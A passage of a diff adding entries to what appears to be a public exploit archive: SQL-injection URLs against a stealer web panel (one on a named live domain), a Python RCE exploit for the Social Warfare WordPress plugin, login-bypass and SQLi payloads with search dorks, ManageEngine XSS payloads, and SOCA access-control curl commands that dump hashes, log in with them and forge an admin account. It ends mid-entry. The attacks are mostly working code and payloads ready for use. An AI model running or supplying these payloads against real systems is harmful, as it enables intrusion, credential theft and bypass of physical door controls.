+http://127.0.0.1/WebPanel/server_side/scripts/server_processing.php?table=passwords&primary=password_id&clmns=a%3A6%3A%7Bi%3A0%3Ba%3A2%3A%7Bs%3A2%3A%22db%22%3Bs%3A11%3A%22server_time%22%3Bs%3A2%3A%22dt%22%3Bs%3A11%3A%22server_time%22%3B%7Di%3A1%3Ba%3A2%3A%7Bs%3A2%3A%22db%22%3Bs%3A7%3A%22pc_name%22%3Bs%3A2%3A%22dt%22%3Bs%3A7%3A%22pc_name%22%3B%7Di%3A2%3Ba%3A2%3A%7Bs%3A2%3A%22db%22%3Bs%3A6%3A%22client%22%3Bs%3A2%3A%22dt%22%3Bs%3A6%3A%22client%22%3B%7Di%3A3%3Ba%3A2%3A%7Bs%3A2%3A%22db%22%3Bs%3A4%3A%22host%22%3Bs%3A2%3A%22dt%22%3Bs%3A4%3A%22host%22%3B%7Di%3A4%3Ba%3A2%3A%7Bs%3A2%3A%22db%22%3Bs%3A8%3A%22username%22%3Bs%3A2%3A%22dt%22%3Bs%3A8%3A%22username%22%3B%7Di%3A5%3Ba%3A2%3A%7Bs%3A2%3A%22db%22%3Bs%3A3%3A%22pwd%22%3Bs%3A2%3A%22dt%22%3Bs%3A3%3A%22pwd%22%3B%7D%7D
+
+PoC Extract full Keystrokes:
+http://etvidanueva.com/photos/images/WebPanel/server_side/scripts/server_processing.php?table=logs&primary=log_id&clmns=a%3A6%3A%7Bi%3A0%3Ba%3A2%3A%7Bs%3A2%3A%22db%22%3Bs%3A6%3A%22log_id%22%3Bs%3A2%3A%22dt%22%3Bs%3A6%3A%22log_id%22%3B%7Di%3A1%3Ba%3A2%3A%7Bs%3A2%3A%22db%22%3Bs%3A11%3A%22server_time%22%3Bs%3A2%3A%22dt%22%3Bs%3A11%3A%22server_time%22%3B%7Di%3A2%3Ba%3A2%3A%7Bs%3A2%3A%22db%22%3Bs%3A4%3A%22hwid%22%3Bs%3A2%3A%22dt%22%3Bs%3A4%3A%22hwid%22%3B%7Di%3A3%3Ba%3A2%3A%7Bs%3A2%3A%22db%22%3Bs%3A7%3A%22pc_name%22%3Bs%3A2%3A%22dt%22%3Bs%3A7%3A%22pc_name%22%3B%7Di%3A4%3Ba%3A2%3A%7Bs%3A2%3A%22db%22%3Bs%3A3%3A%22log%22%3Bs%3A2%3A%22dt%22%3Bs%3A3%3A%22log%22%3B%7Di%3A5%3Ba%3A2%3A%7Bs%3A2%3A%22db%22%3Bs%3A9%3A%22ip_addres%22%3Bs%3A2%3A%22dt%22%3Bs%3A9%3A%22ip_addres%22%3B%7D%7D
\ No newline at end of file
diff --git a/exploits/php/webapps/46787.txt b/exploits/php/webapps/46787.txt
new file mode 100644
index 000000000..52b26f4f0
--- /dev/null
+++ b/exploits/php/webapps/46787.txt
@@ -0,0 +1,12 @@
+# Exploit Title: Instagram Auto Follow - Autobot Instagram - Authentication Bypass
+# Date: 2019-05-01
+# Exploit Author: Veyselxan
+# Vendor Homepage: https://codecanyon.net/item/instagram-auto-follow-autobot-instagram/23720743?s_rank=4
+
+# Tested on: Linux
+https://eowynlab.cf/autobot-follow/index.php
+
+
+username: admin' or '1'='1
+
+Password: admin' or '1'='1
\ No newline at end of file
diff --git a/exploits/php/webapps/46794.py b/exploits/php/webapps/46794.py
new file mode 100755
index 000000000..cfded3195
--- /dev/null
+++ b/exploits/php/webapps/46794.py
@@ -0,0 +1,67 @@
+# Title: RCE in Social Warfare Plugin Wordpress ( <=3D3.5.2 )
+# Date: March, 2019
+# Researcher: Luka Sikic
+# Exploit Author: hash3liZer
+# Download Link: https://wordpress.org/plugins/social-warfare/
+# Reference: https://wpvulndb.com/vulnerabilities/9259?fbclid=3DIwAR2xLSnan=ccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM
+# Github: https://github.com/hash3liZer/CVE-2019-9978
+# Version: <=3D 3.5.2
+# CVE: CVE-2019-9978
+
+# Title: RCE in Social Warfare Plugin Wordpress ( <=3.5.2 )
+# Date: March, 2019
+# Researcher: Luka Sikic
+# Exploit Author: hash3liZer
+# Download Link: https://wordpress.org/plugins/social-warfare/
+# Reference: https://wpvulndb.com/vulnerabilities/9259?fbclid=IwAR2xLSnanccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM
+# Github: https://github.com/hash3liZer/CVE-2019-9978
+# Version: <= 3.5.2
+# CVE: CVE-2019-9978
+
+import sys
+import requests
+import re
+import urlparse
+import optparse
+
+class EXPLOIT:
+
+	VULNPATH = "wp-admin/admin-post.php?swp_debug=load_options&swp_url=%s"
+
+	def __init__(self, _t, _p):
+		self.target  = _t
+		self.payload = _p
+
+	def engage(self):
+		uri = urlparse.urljoin( self.target, self.VULNPATH % self.payload )
+		r = requests.get( uri )
+		if r.status_code == 500:
+			print "[*] Received Response From Server!"
+			rr  = r.text
+			obj = re.search(r"^(.*)<\!DOCTYPE", r.text.replace( "\n", "lnbreak" ))
+			if obj:
+				resp = obj.groups()[0]
+				if resp:
+					print "[<] Received: "
+					print resp.replace( "lnbreak", "\n" )
+				else:
+					sys.exit("[<] Nothing Received for the given payload. Seems like the server is not vulnerable!")
+			else:
+				sys.exit("[<] Nothing Received for the given payload. Seems like the server is not vulnerable!")
+		else:
+			sys.exit( "[~] Unexpected Status Received!" )
+
+def main():
+	parser = optparse.OptionParser(  )
+
+	parser.add_option( '-t', '--target', dest="target", default="", type="string", help="Target Link" )
+	parser.add_option( ''  , '--payload-uri', dest="payload", default="", type="string", help="URI where the file payload.txt is located." )
+
+	(options, args) = parser.parse_args()
+
+	print "[>] Sending Payload to System!"
+	exploit = EXPLOIT( options.target, options.payload )
+	exploit.engage()
+
+if __name__ == "__main__":
+	main()
\ No newline at end of file
diff --git a/exploits/php/webapps/46798.txt b/exploits/php/webapps/46798.txt
new file mode 100644
index 000000000..909496bd0
--- /dev/null
+++ b/exploits/php/webapps/46798.txt
@@ -0,0 +1,56 @@
+[+] Sql Injection on PHPads Version 2.0 based on Pixelledads 1.0 by Nile Flores
+
+[+] Date: 05/05/2019
+
+[+] Risk: High
+
+[+] CWE Number : CWE-89
+
+[+] Author: Felipe Andrian Peixoto
+
+[+] Vendor Homepage: https://blondish.net/
+
+[+] Software Demo : https://github.com/blondishnet/PHPads/blob/master/readme.txt
+
+[+] Contact: felipe_andrian@hotmail.com
+
+[+] Tested on: Windows 7 and Gnu/Linux
+
+[+] Dork: inurl:"click.php3?bannerID="" // use your brain ;)
+
+[+] Exploit : 
+
+        http://host/patch//click.php3?bannerID= [SQL Injection]
+
+[+] Vulnerable File :
+
+	    <?php
+		$bannerAdsPath = './ads.dat';
+		require './ads.inc.php';
+		///////////////////////////////////////
+		// Don't Edit Anything Below This Line!
+		///////////////////////////////////////
+		for ($i = 0; $i < count($ads); $i++) {
+			if(ereg('^' .$_GET['id']. '\|\|', $ads[$i])) {
+				$data = explode('||', $ads[$i]);
+			if ($_SERVER['REMOTE_ADDR'] != $bannerAds['blockip']) {
+					$data[ PHPADS_ADELEMENT_CLICKTHRUS ]++;
+			}
+				$ads[$i] = join('||', $data);
+				break;
+			}
+		}
+		if (!$data[PHPADS_ADELEMENT_LINK_URI]) {
+			die();
+		}
+		writeads();
+		Header("Location: ". $data[PHPADS_ADELEMENT_LINK_URI]);
+		exit;
+		?>
+
+[+] PoC : 
+ 
+   http://server/phpads/click.php3?bannerID=-1/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
+   http:/server/phpAds/click.php3?bannerID=-1/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
+   
+[+] EOF
\ No newline at end of file
diff --git a/exploits/php/webapps/46815.txt b/exploits/php/webapps/46815.txt
new file mode 100644
index 000000000..364383dd4
--- /dev/null
+++ b/exploits/php/webapps/46815.txt
@@ -0,0 +1,50 @@
+[+] Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Multiple Cross-Site Scripting
+[+] Author: Ibrahim Raafat
+[+] Twitter: https://twitter.com/RaafatSEC
+[+] Download: https://www.manageengine.com/products/self-service-password/download-free.html?
+
+
+[+] TimeLine
+	[-] Nov 23, 2018	Reported
+	[-] Nov 26, 2018	Triaged
+	[-] Dec 27, 2018 	Fixed
+	[-] May 08, 2019	Public Disclosure
+
+[+] Description:
+	Zoho ManageEngine ADSelfService Plus 5.7 before build 5702 has Multiple XSS vulnerabilites
+
+[+] POC
+
+[-] Employee search form
+
+POST /EmployeeSearch.cc?actionId=Search HTTP/1.1
+
+searchString=dddddffff");a=alert,a(31337)//&&searchType=contains&searchBy=ALL_FIELDS333');a=alert,a(31337)//&adscsrf=
+searchType parameter:
+searchString=a&searchType=containss9ek";a=alert,a(31337)//&searchBy=ALL_FIELDS&adscsrf=
+
+
+2- Employee Search – ascending parameter
+
+/EmployeeSearch.cc?actionId=showList&searchBy=ALL_FIELDS&searchType=contains&PAGE_NUMBER=37&FROM_INDEX=22&TO_INDEX=22&RANGE=100&navigate=true&navigationType=&START_INDEX=22 HTTP/1.1
+
+selOUs=&genID=12191&ACTIVE_TAB=user&sortIndex=0&ascending=true’;a=alert,a(31337)//&&searchString=a&TOTAL_RECORDS=22&adscsrf=
+
+
+3- EmpSearch.cc - searchString parameter
+
+POST /EmpSearch.cc?operation=getSearchResult&REQUEST_TYPE=JSON&searchString=RR<svg%2fonload%3dprompt(8)>&searchType=contains&searchBy=ALL_FIELDS&actionId=Search HTTP/1.1
+
+&adscsrf=
+
+4- Stored XSS in self-update layout implementation.
+
+/SelfService.do?methodToCall=selfService&selectedTab=UpdateFields
+Insert the following payload into Mobile Number field, and save
+Payload: 11111111]";a=alert,a(31337)//
+Code execute here:
+/Enrollment.do?selectedTab=Enrollment
+
+
+[+] Assigned CVE:  CVE-2018-20484,CVE-2018-20485
+[+] Release Notes: https://www.manageengine.com/products/self-service-password/release-notes.html
\ No newline at end of file
diff --git a/exploits/php/webapps/46832.txt b/exploits/php/webapps/46832.txt
new file mode 100644
index 000000000..9ac7f7c1a
--- /dev/null
+++ b/exploits/php/webapps/46832.txt
@@ -0,0 +1,92 @@
+SOCA Access Control System 180612 Information Disclosure
+
+
+Vendor: SOCA Technology Co., Ltd
+Product web page: http://www.socatech.com
+Affected version: 180612, 170000 and 141007
+
+Summary: The company's products include proximity and fingerprint access
+control system, time and attendance, electric locks, card reader and writer,
+keyless entry system and other 30 specialized products. All products are
+attractively designed with advanced technology in accordance with users'
+safety and convenience which also fitted international standard.
+
+Desc: Insecure direct object references occur when an application provides
+direct access to objects based on user-supplied input. As a result of this
+vulnerability attackers can bypass authorization and access resources and
+functionalities in the system.
+
+Tested on: Windows NT 6.1 build 7601 (Windows 7 Service Pack 1) i586
+           Windows NT 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
+           Apache/2.2.22 (Win32)
+           PHP/5.4.13
+           Firebird/InterBase DBMS
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5517
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5517.php
+
+
+20.04.2018
+
+--
+
+
+Authenticated users password hash disclosure via Get_Permissions_From_DB.php:
+-----------------------------------------------------------------------------
+
+# curl -s http://10.0.0.3/Permission/Get_Permission_From_DB.php -H "Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"
+
+[{"Idx":1,"Id":"USER","Password":"4a7d1ed414474e4033ac29ccb8653d9b","Access":"ffffff00ff00ffffff00"},{"Idx":2,"Id":"soca","Password":"3c0d71fab22bc8703324e06d59a81700","Access":"ffffff00ff00ffffff00"}]
+
+
+Unauthenticated users passwords (pins) disclosure via Ac10_ReadSortCard:
+------------------------------------------------------------------------
+
+# curl -X POST http://10.0.0.3/cgi-bin/Reader_Action.cgi/Ac10_ReadSortCard --data "Reader=%7B%22Idx%22%3A5%2C%22Model%22%3A502%2C%22Comm%22%3A%22TCP%2C10.0.0.3%2C4444%22%2C%22Timeout%22%3A1%2C%22SubNames%22%3A%7B%221%22%3A%22%22%2C%222%22%3A%22%22%2C%223%22%3A%22%22%2C%224%22%3A%22%22%2C%225%22%3A%22%22%2C%226%22%3A%22%22%2C%227%22%3A%22%22%2C%228%22%3A%22%22%7D%2C%22CreateTime%22%3A%222016-04-28+15%3A57%3A31%22%2C%22EditTime%22%3A%222018-12-26+17%3A14%3A37%22%2C%22Polling%22%3A1%2C%22Done%22%3Afalse%7D&Section=17" -s |grep Password |lolcat
+
+{"cmd":"readcard","success":true,"Reader":{"Idx":5,"Model":502,"SubNames":
+{"8":"","7":"","6":"","5":"","4":"","3":"","2":"","1":""},"No":1,"Polling":
+1,"EditTime":"2018-12-26 17:14:37","Name":"READER017","Done":false,"Comm":"TCP,10.0.0.3,4444",
+"Timeout":1,"CreateTime":"2016-04-28 15:57:31"},"Section":17,"Cards":[
+{"Card":"3758236739","Password":"0000","Timezone":"1"},{"Card":"3758294894","Password":"0000","Timezone":"1"},
+{"Card":"3758393748","Password":"0000","Timezone":"1"},{"Card":"3758397434","Password":"0000","Timezone":"1"},
+{"Card":"3758526944","Password":"0000","Timezone":"1"},{"Card":"3758556239","Password":"0000","Timezone":"1"},
+{"Card":"3759183323","Password":"0000","Timezone":"1"},{"Card":"3759289453","Password":"0000","Timezone":"1"},
+{"Card":"3759444892","Password":"0000","Timezone":"1"},{"Card":"3759608121","Password":"0000","Timezone":"1"},
+{"Card":"3759700024","Password":"0000","Timezone":"1"},{"Card":"3760195859","Password":"0000","Timezone":"1"},
+{"Card":"3760330834","Password":"0000","Timezone":"1"},{"Card":"3760455789","Password":"0000","Timezone":"1"},
+{"Card":"3760493498","Password":"0000","Timezone":"1"},{"Card":"3760555917","Password":"0000","Timezone":"1"},
+{"Card":"3760674062","Password":"0000","Timezone":"1"},{"Card":"3761256706","Password":"0000","Timezone":"1"},
+{"Card":"3761275358","Password":"0000","Timezone":"1"},{"Card":"3761386285","Password":"0000","Timezone":"1"},
+{"Card":"3761398620","Password":"0000","Timezone":"1"},{"Card":"3761452653","Password":"0000","Timezone":"1"},
+{"Card":"3761514319","Password":"0000","Timezone":"1"},{"Card":"3761543092","Password":"0000","Timezone":"1"},
+{"Card":"3761766657","Password":"0000","Timezone":"1"},{"Card":"3761783860","Password":"0000","Timezone":"1"},
+{"Card":"3762311449","Password":"0000","Timezone":"1"},{"Card":"3762313335","Password":"0000","Timezone":"1"},
+{"Card":"3762328203","Password":"0000","Timezone":"1"},{"Card":"3762384973","Password":"0000","Timezone":"1"},
+{"Card":"3762647673","Password":"0000","Timezone":"1"},{"Card":"3762688310","Password":"0000","Timezone":"1"},
+{"Card":"3762771467","Password":"0000","Timezone":"1"},{"Card":"3762827566","Password":"0000","Timezone":"1"},
+{"Card":"3762843960","Password":"0000","Timezone":"1"},{"Card":"3762910530","Password":"0000","Timezone":"1"},
+{"Card":"3763344650","Password":"0000","Timezone":"1"},{"Card":"3763417869","Password":"0000","Timezone":"1"},
+{"Card":"3763492897","Password":"0000","Timezone":"1"},{"Card":"3763734440","Password":"0000","Timezone":"1"},
+{"Card":"3763865189","Password":"0000","Timezone":"1"},{"Card":"3763889211","Password":"0000","Timezone":"1"},
+{"Card":"3764619719","Password":"0000","Timezone":"1"},{"Card":"3764811544","Password":"0000","Timezone":"1"},
+{"Card":"3764846862","Password":"0000","Timezone":"1"},{"Card":"3765568542","Password":"0000","Timezone":"1"},
+{"Card":"3765790491","Password":"0000","Timezone":"1"},{"Card":"3765917518","Password":"0000","Timezone":"1"},
+{"Card":"3765962614","Password":"0000","Timezone":"1"},{"Card":"3765978672","Password":"0000","Timezone":"1"},
+{"Card":"3766032648","Password":"0000","Timezone":"1"},{"Card":"3766498811","Password":"0000","Timezone":"1"},
+{"Card":"3766625241","Password":"0000","Timezone":"1"},{"Card":"3766970803","Password":"0000","Timezone":"1"},
+{"Card":"3767105946","Password":"0000","Timezone":"1"},{"Card":"3767601584","Password":"0000","Timezone":"1"},
+...
+...
+...
+
+
+phpinfo() disclosure:
+---------------------
+
+# curl -s http://10.0.0.3/phpinfo.php
\ No newline at end of file
diff --git a/exploits/php/webapps/46833.txt b/exploits/php/webapps/46833.txt
new file mode 100644
index 000000000..9ec0bf62a
--- /dev/null
+++ b/exploits/php/webapps/46833.txt
@@ -0,0 +1,137 @@
+SOCA Access Control System 180612 SQL Injection And Authentication Bypass
+
+
+Vendor: SOCA Technology Co., Ltd
+Product web page: http://www.socatech.com
+Affected version: 180612, 170000 and 141007
+
+Summary: The company's products include proximity and fingerprint access
+control system, time and attendance, electric locks, card reader and writer,
+keyless entry system and other 30 specialized products. All products are
+attractively designed with advanced technology in accordance with users'
+safety and convenience which also fitted international standard.
+
+Desc: The Soca web access control system suffers from multiple SQL Injection
+vulnerabilities. Input passed via multiple POST parameters is not properly
+sanitised before being returned to the user or used in SQL queries. This
+can be exploited to manipulate SQL queries by injecting arbitrary SQL code
+and bypass the authentication mechanism. It allows the attacker to remotely
+disclose password hashes and login with MD5 hash with highest privileges 
+resulting in unlocking doors and bypass the physical access control in place.
+
+Tested on: Windows NT 6.1 build 7601 (Windows 7 Service Pack 1) i586
+           Windows NT 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
+           Apache/2.2.22 (Win32)
+           PHP/5.4.13
+           Firebird/InterBase DBMS
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5519
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5519.php
+
+
+20.04.2018
+
+--
+
+
+Authentication bypass / SQL injection via pos_id POST parameter in Login.php:
+-----------------------------------------------------------------------------
+-version 141007
+
+# curl -X POST --data "pos_id=' or 1=1--&pos_pw=whatever&Lang=eng" -i\
+"http://10.0.0.4/Login/Login.php"
+
+HTTP/1.1 200 OK
+Date: Fri, 03 May 2018 13:37:25 GMT
+Server: Apache/2.2.22 (Win32) PHP/5.4.13
+X-Powered-By: PHP/5.4.13
+Set-Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 5
+Content-Type: text/html
+
+ true
+
+
+Authentication bypass / SQL injection via ID POST parameter in Login.php:
+=========================================================================
+-version 180612
+
+# curl -X POST --data "ID=' or 1=1--&PW=whatever&Lang=eng"\
+"http://10.0.0.3/Login/Login.php"
+
+{"LoginCheck":true,"Session":{"IP":"10.0.0.9","sess_Lang":"eng","sess_id":"' or 1=1--","sess_passwd":"008c5926ca861023c1d2a36653fd88e2","sess_Access":{"Reader":1,"User":1,"Card":1,"Groups":1,"Historys":1,"Special_Query":1,"Permission":1,"WorkGroup":1,"Attend":1,"WorkTime":1,"Dep":1,"Holiday":1,"ConvertHistory":1,"Backup_Database":1,"Auto_Update_Card":1,"Mail_Report":1}}}
+
+
+Authenticated SQL injection via cidx POST parameter in Card_Edit_GetJson.php:
+=============================================================================
+
+Dump current user:
+------------------
+
+# curl -X POST --data "cidx=144 and 1=(user)"\
+"http://10.0.0.3/Card/Card_Edit_GetJson.php"\
+-H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"
+
+Warning:  ibase_fetch_assoc(): conversion error from string "SYSDBA";  in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17
+
+Dump table:
+-----------
+
+# curl -X POST --data "cidx=144 and 1=(select+first+1+skip+57+distinct+rdb$relation_name+from+rdb$relation_fields)"\
+"http://10.0.0.3/Card/Card_Edit_GetJson.php"\
+-H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"
+
+Warning:  ibase_fetch_assoc(): conversion error from string "USERS";  in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17
+
+Dump column:
+------------
+
+# curl -X POST --data "cidx=144 and 1=(select+first+1+skip+2+distinct+rdb$field_name+from+rdb$relation_fields where rdb$relation_name=(select+first+1+skip+57+distinct+rdb$relation_name+from+rdb$relation_fields))"\
+"http://10.0.0.3/Card/Card_Edit_GetJson.php"\
+-H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"
+
+Warning:  ibase_fetch_assoc(): conversion error from string "U_NAME";  in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17
+
+Dump column:
+------------
+
+# curl -X POST --data "cidx=144 and 1=(select+first+1+skip+2+distinct+rdb$field_name+from+rdb$relation_fields where rdb$relation_name=(select+first+1+skip+56+distinct+rdb$relation_name+from+rdb$relation_fields))"\
+"http://10.0.0.3/Card/Card_Edit_GetJson.php"\
+-H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"
+
+Warning:  ibase_fetch_assoc(): conversion error from string "U_PASSWORD";  in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17
+
+Dump username and Idx from USERS table:
+---------------------------------------
+
+# curl -X POST --data "cidx=144 and 1=(select+first+1+skip+0+U_NAME || U_IDX+from+USERS)"\
+"http://10.0.0.3/Card/Card_Edit_GetJson.php"\
+-H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"
+
+Warning:  ibase_fetch_assoc(): conversion error from string "USER1";  in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17
+
+Dump passwords from UAC table:
+------------------------------
+
+# curl -X POST --data "cidx=144 and 1=(select+first+1+skip+0+U_PASSWORD+from+UAC)"\
+"http://10.0.0.3/Card/Card_Edit_GetJson.php"\
+-H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"
+
+Warning:  ibase_fetch_assoc(): conversion error from string "4a7d1ed414474e4033ac29ccb8653d9b";  in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17
+
+
+Login with MD5:
+===============
+
+# curl -X POST --data "ID=USER&PW=4a7d1ed414474e4033ac29ccb8653d9b&Lang=eng"
+"http://10.0.0.3/Login/Login.php"\
+
+{"LoginCheck":true,"Session":{"IP":"10.0.0.9","sess_Lang":"eng","sess_id":"USER","sess_passwd":"4a7d1ed414474e4033ac29ccb8653d9b","sess_Access":{"Reader":1,"User":1,"Card":1,"Groups":1,"Historys":1,"Special_Query":1,"Permission":1,"WorkGroup":1,"Attend":1,"WorkTime":1,"Dep":1,"Holiday":1,"ConvertHistory":1,"Backup_Database":1,"Auto_Update_Card":1,"Mail_Report":1}}}
\ No newline at end of file
diff --git a/exploits/php/webapps/46834.txt b/exploits/php/webapps/46834.txt
new file mode 100644
index 000000000..467d243ef
--- /dev/null
+++ b/exploits/php/webapps/46834.txt
@@ -0,0 +1,46 @@
+SOCA Access Control System 180612 CSRF Add Admin Exploit
+
+
+Vendor: SOCA Technology Co., Ltd
+Product web page: http://www.socatech.com
+Affected version: 180612, 170000 and 141007
+
+Summary: The company's products include Proximity and Fingerprint access
+control system, Time and Attendance, Electric Locks, Card reader and writer,
+keyless entry system and other 30 specialized products. All products are
+attractively designed with advanced technology in accordance with users'
+safety and convenience which also fitted international standard.
+
+Desc: The application interface allows users to perform certain actions via
+HTTP requests without performing any validity checks to verify the requests.
+This can be exploited to perform certain actions with administrative privileges
+if a logged-in user visits a malicious web site.
+
+Tested on: Windows NT 6.1 build 7601 (Windows 7 Service Pack 1) i586
+           Windows NT 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
+           Apache/2.2.22 (Win32)
+           PHP/5.4.13
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5520
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5520.php
+
+
+20.04.2018
+
+--
+
+
+<html>
+  <body>
+  <script>history.pushState('', 'shpa', '/index-pc.php')</script>
+    <form action="http://10.0.0.3/Permission/Insert_Permission.php" method="POST">
+      <input type="hidden" name="Permission" value='{"Idx":null,"Id":"Imposter","Password":"123456","Access":"ffffff00ff00ffffff00"}' />
+      <input type="submit" value="Forge!" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/46835.txt b/exploits/php/webapps/46835.txt
new file mode 100644
index 000000000..3c22c7fc5
--- /dev/null
+++ b/exploits/php/webapps/46835.txt
@@ -0,0 +1,24 @@
+[+] Sql Injection on XOOPS CMS v.2.5.9
+
+[+] Date: 12/05/2019
+
+[+] Risk: High
+
+[+] CWE Number : CWE-89
+
+[+] Author: Felipe Andrian Peixoto
+
+[+] Vendor Homepage: https://xoops.org/
+
+[+] Contact: felipe_andrian@hotmail.com
+
+[+] Tested on: Windows 7 and Gnu/Linux
+
+[+] Dork: inurl:gerar_pdf.php inurl:modules // use your brain ;)
+
+[+] Exploit : 
+
+        http://host/patch/modules/patch/gerar_pdf.php?cid= [SQL Injection]
+
+   
+[+] EOF
\ No newline at end of file
diff --git a/exploits/php/webapps/46838.txt b/exploits/php/webapps/46838.txt
new file mode 100644
index 000000000..5b2028025
--- /dev/null
+++ b/exploits/php/webapps/46838.txt
@@ -0,0 +1,118 @@
+SEC Consult Vulnerability Lab Security Advisory < 20190510-0 >
+=======================================================================
+              title: Unauthenticated SQL Injection vulnerability
+            product: OpenProject
+ vulnerable version: 5.0.0 - 8.3.1
+      fixed version: 8.3.2 & 9.0.0
+         CVE number: CVE-2019-11600
+             impact: Critical
+           homepage: https://www.openproject.org
+              found: 2019-04-17
+                 by: T. Soo (Office Bangkok)
+                     SEC Consult Vulnerability Lab
+
+                     An integrated part of SEC Consult
+                     Europe | Asia | North America
+
+                     https://www.sec-consult.com
+
+=======================================================================
+
+Vendor description:
+-------------------
+"OpenProject is the leading open source project management software.
+Support your project management process along the entire project
+life cycle: From project initiation to closure."
+
+Source: https://www.openproject.org/
+
+
+Business recommendation:
+------------------------
+The vendor provides a patch which should be applied immediately.
+
+An in-depth security analysis performed by security professionals is
+highly advised, as the software may be affected from further security issues.
+
+
+Vulnerability overview/description:
+-----------------------------------
+An SQL injection vulnerability has been identified in the web "activities API".
+An unauthenticated attacker could successfully perform an attack to extract
+potentially sensitive information from the database if OpenProject is configured
+not to require authentication for API access.
+
+
+Proof of concept:
+-----------------
+Requesting the following URL will trigger a time delay as a proof of concept
+for exploiting the blind SQL injection:
+http://<host>/api/v3/activities/1)%20AND%203281%3d(SELECT%203281%20FROM%20PG_SLEEP(1))%20AND%20(7777%3d7777
+
+
+Vulnerable / tested versions:
+-----------------------------
+The vulnerability has been identified in OpenProject version 8.3.1 which
+was the most current version at the time of discovery.
+
+According to the vendor all versions between 5.0.0 and 8.3.1 are affected.
+Older versions (< 5.0.0) are not vulnerable.
+
+
+Vendor contact timeline:
+------------------------
+2019-04-30: Contacting vendor through security@openproject.com
+2019-04-30: A patch is published in version 8.3.2
+2019-05-06: Vendor publishes further details
+2019-05-10: Release of security advisory
+
+
+Solution:
+---------
+The vendor provides a patched version 8.3.2 and a security notice with further
+information:
+
+https://www.openproject.org/release-notes/openproject-8-3-2
+https://groups.google.com/forum/#!msg/openproject-security/XlucAJMxmzM/hESpOaFVAwAJ
+
+
+Workaround:
+-----------
+None
+
+
+Advisory URL:
+-------------
+https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
+
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+SEC Consult Vulnerability Lab
+
+SEC Consult
+Europe | Asia | North America
+
+About SEC Consult Vulnerability Lab
+The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
+ensures the continued knowledge gain of SEC Consult in the field of network
+and application security to stay ahead of the attacker. The SEC Consult
+Vulnerability Lab supports high-quality penetration testing and the evaluation
+of new offensive and defensive technologies for our customers. Hence our
+customers obtain the most current information about vulnerabilities and valid
+recommendation about the risk profile of new technologies.
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Interested to work with the experts of SEC Consult?
+Send us your application https://www.sec-consult.com/en/career/index.html
+
+Interested in improving your cyber security with the experts of SEC Consult?
+Contact our local offices https://www.sec-consult.com/en/contact/index.html
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Mail: research at sec-consult dot com
+Web: https://www.sec-consult.com
+Blog: http://blog.sec-consult.com
+Twitter: https://twitter.com/sec_consult
+
+EOF Thanaphon Soo / @2019
\ No newline at end of file
diff --git a/exploits/php/webapps/46840.txt b/exploits/php/webapps/46840.txt
new file mode 100644
index 000000000..ca3292869
--- /dev/null
+++ b/exploits/php/webapps/46840.txt
@@ -0,0 +1,81 @@
+===========================================================================================
+# Exploit Title: SalesERP v.8.1 SQL Inj.
+# Dork: N/A
+# Date: 13-05-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: https://codecanyon.net/category/php-scripts?term=sales%20erp
+# Version: v8.1
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: ERP is a Modern and responsvie small Business
+management system.
+It is developed by PHP and Codeginiter framework. It is design and develop
+for thinking shop,
+small business, company and any types of business.Here has accounting,
+management, invoice,user and data analysis.
+===========================================================================================
+# POC - SQLi
+# Parameters : customer_id, product_id
+# Attack Pattern : %27/**/oR/**/4803139=4803139/**/aNd/**/%276199%27=%276199
+# POST Method :
+http://localhost/erpbusiness/SalesERPv810/Cproduct/product_by_search?product_id=99999999[SQL
+Inject Here]
+# POST Method :
